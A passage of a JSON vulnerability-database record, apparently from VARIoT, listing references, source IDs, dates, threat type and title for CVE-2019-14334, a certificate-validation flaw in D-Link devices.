"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146270"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"date": "2019-08-01T13:15:14.100000",
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"date": "2019-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-146270"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"date": "2019-08-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"date": "2024-11-21T04:26:31.880000",
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Vulnerabilities related to certificate validation in product devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
}
],
"trust": 0.6
}
}